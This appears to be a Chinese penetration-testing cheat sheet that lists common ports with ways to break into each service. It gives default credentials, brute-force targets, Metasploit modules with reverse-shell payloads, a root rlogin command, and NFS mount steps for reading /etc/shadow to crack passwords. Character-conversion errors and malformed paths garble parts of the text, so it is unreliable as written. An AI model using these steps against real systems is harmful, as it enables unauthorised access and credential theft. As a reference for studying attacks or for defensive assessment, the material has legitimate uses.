天天看點

常見端口入侵

20:FTP服務的資料傳輸端口

21:FTP服務的連接配接端口,可能存在 匿名登陸 弱密碼暴力破解 匿名登陸:1.用nc連結21号端口 2.直接使用USER anonymous PASS xxxx

22:SSH服務端口,可能存在 弱密碼暴力破解

23:Telnet端口,可能存在 弱密碼暴力破解

25:SMTP簡單郵件傳輸協定端口,和 POP3 的110端口對應

43:whois服務端口

53:DNS服務端口(TCP/UDP 53)

67/68:DHCP服務端口

69:TFTP端口,可能存在弱密碼

80:HTTP端口,常見web漏洞

110:POP3郵件服務端口,和SMTP的25端口對應

111:rpcbind服務,可能存在端口洩露 使用nmap腳本: nmap -p 111 --script=rpcinfo 目标

135:RPC服務

137/138:NMB服務

139:SMB/CIFS服務,可能存在遠端代碼執行 MSF子產品:use multi/samba/usermap_script PAYLOAD: cmd/unix/reverse

143:IMAP協定端口

161/162: Snmp服務,public弱密碼

389:LDAP目錄通路協定,有可能存在注入、弱密碼

443:HTTPS端口,心髒滴血等與SSL有關的漏洞

445:SMB服務端口,可能存在永恒之藍漏洞MS17-010,和遠端代碼執行

512/513/514:Linux Rexec服務端口,可能存在爆破, 如果配置錯誤,是開啟的rlogin服務則可以使用以下指令進行最高權限登陸 rlogin -l root 被攻擊者ip 就可獲得最高權限

873:Rsync ,可能存在Rsync未授權通路漏洞,傳送門:rsync 未授權通路漏洞

1080:socket端口,可能存在爆破

1099:RMI,可能存在 RMI反序列化漏洞 使用msf 子產品:exploit/multi/misc/java_rmi_server payload: java/meterpreter/reverse_tcp

1352:Lotus domino郵件服務端口,可能存在弱密碼、資訊洩露

1433:SQL Server資料庫端口,可能存在弱密碼

1434:用于向請求者傳回SQL Server使用了哪個TCP/IP端口

1521:oracle資料庫端口

後門:xx端口: xxx服務,後門,已經被攻擊。 掃描時出現bingshell綁定shell,則表明可能存在後門 nc連接配接後門:nc xxx 端口 直接連接配接

2049:NFS服務端口(網絡共享資源和smb類似),可能存在NFS配置不當 檢視銘感目錄: nmap --script=nfs-* 被攻擊者ip 探測nfs是否可導出: 安裝nfs-common: apt-get install nfs-common 探測銘感目錄是否可以導出: showmount -e 被攻擊者ip 檢視導出内容: mkdir nfs_root mount -t nfs(服務)被攻擊者的ip:/被導出的内容,比如:-/nsf_root(導出到這個檔案) -o nolock(直接導出的意思)

最後在 cat -/nfs_root/etc/shadow 下檢視,(根據自己存放的位置) cat /etc/shadow cat /etc/passwd 結合起來就可以破解出他的賬号和密碼

2121:ccproxy-ftp,特點:ftp伺服器程式,proftpd,暴力破解

2181:ZooKeeper監聽端口,可能存在 ZooKeeper未授權通路漏洞

2375:Docker端口,可能存在 Docker未授權通路漏洞

2601: Zebra ,預設密碼zebr

27017:MongoDB未授權通路

3128: squid ,匿名通路(可能内網漫遊)

3306:MySQL資料庫端口,可能存在 弱密碼暴力破解

3389:Windows遠端桌面服務,可能存在 弱密碼漏洞 或者 CVE-2019-0708 遠端桌面漏洞複現

3690:SVN服務,可能存在SVN洩漏,未授權通路漏洞

4440:Rundeck,弱密碼admin

4560:log4j SocketServer監聽的端口,可能存在 log4j<=1.2.17反序列化漏洞(CVE-2019-17571)

4750:BMC,可能存在 BMC伺服器自動化RSCD代理遠端代碼執行(CVE-2016-1542)

4848:GlassFish控制台端口,可能存在弱密碼admin/adminadmin

5000:SysBase/DB2資料庫端口,可能存在爆破、注入漏洞

5432:PostGreSQL資料庫的端口

5632:PyAnywhere服務端口,可能存在代碼執行漏洞

5900/5901:VNC監聽端口(遠端控制),可能存在 VNC未授權通路漏洞 ,暴力破解 msf: 子產品:auxiliary/scanner/vnc/vnc_login 字典使用預設字典,破解密碼和賬戶 最後: 安裝vnc viewer用戶端軟體連接配接vnc服務端

5984:CouchDB端口,可能存在 CouchDB未授權通路漏洞

6379:Redis資料庫端口,可能存在Redis未授權通路漏洞,傳送門:Redis未授權通路漏洞

6667:irc服務(聊天服務)也有漏洞

7001/7002:Weblogic,可能存在Weblogic反序列化漏洞,傳送門:Weblogic反序列化漏洞

7180:Cloudera manager端口

8069:Zabbix服務端口,可能存在Zabbix弱密碼導緻的Getshell漏洞

8080:Tomcat、JBoss,可能存在Tomcat管理頁面弱密碼Getshell,JBoss未授權通路漏洞,傳送門:Tomcat管理弱密碼頁面Getshell

8080-8090:可能存在web服務

8089:Jetty、Jenkins服務端口,可能存在反序列化,控制台弱密碼等漏洞

8161:Apache ActiveMQ背景管理系統端口,預設密碼密碼為:admin:admin ,可能存在CVE-2016-3088漏洞,傳送門:Apache ActiveMQ任意檔案寫入漏洞(CVE-2016-3088)

8180:tomcat,(免費開源代碼的web應用伺服器,屬于輕量級應用伺服器) 子產品:auxiliary/scanner/http/tomcat_mgr_login,破解登陸密碼 子產品:multi/http/tomcat_mgr_deploy,反彈shell

8500:Adobe ColdFusion 任意檔案讀取,反序列化漏洞

該服務為:JRun Web Server

9000:fastcgi端口,可能存在遠端指令執行漏洞

9001:Supervisord,可能存在Supervisord遠端指令執行漏洞(CVE-2017-11610),傳送門:Supervisord遠端指令執行漏洞(CVE-2017-11610)

9043/9090:WebSphere,可能存在WebSphere反序列化漏洞

9200/9300:Elasticsearch監聽端口,可能存在 Elasticsearch未授權通路漏洞 10000:Webmin-Web控制台,可能存在弱密碼

10001/10002:JmxRemoteLifecycleListener監聽的,可能存在Tomcat反序列化漏洞,傳送門:Tomcat反序列化漏洞(CVE-2016-8735)

11211:Memcached監聽端口,可能存在 Memcached未授權通路漏洞

27017/27018:MongoDB資料庫端口,可能存在 MongoDB未授權通路漏洞

50000:SAP Management Console服務端口,可能存在 運程指令執行漏洞。

50070:Hadoop服務端口,可能存在 Hadoop未授權通路漏洞

61616:Apache ActiveMQ服務端口,可能存在 Apache ActiveMQ任意檔案寫入漏洞(CVE-2016-3088)複現

60020:hbase.regionserver.port,HRegionServer的RPC端口

60030:hbase.regionserv er.info.port,HRegionServer的http端口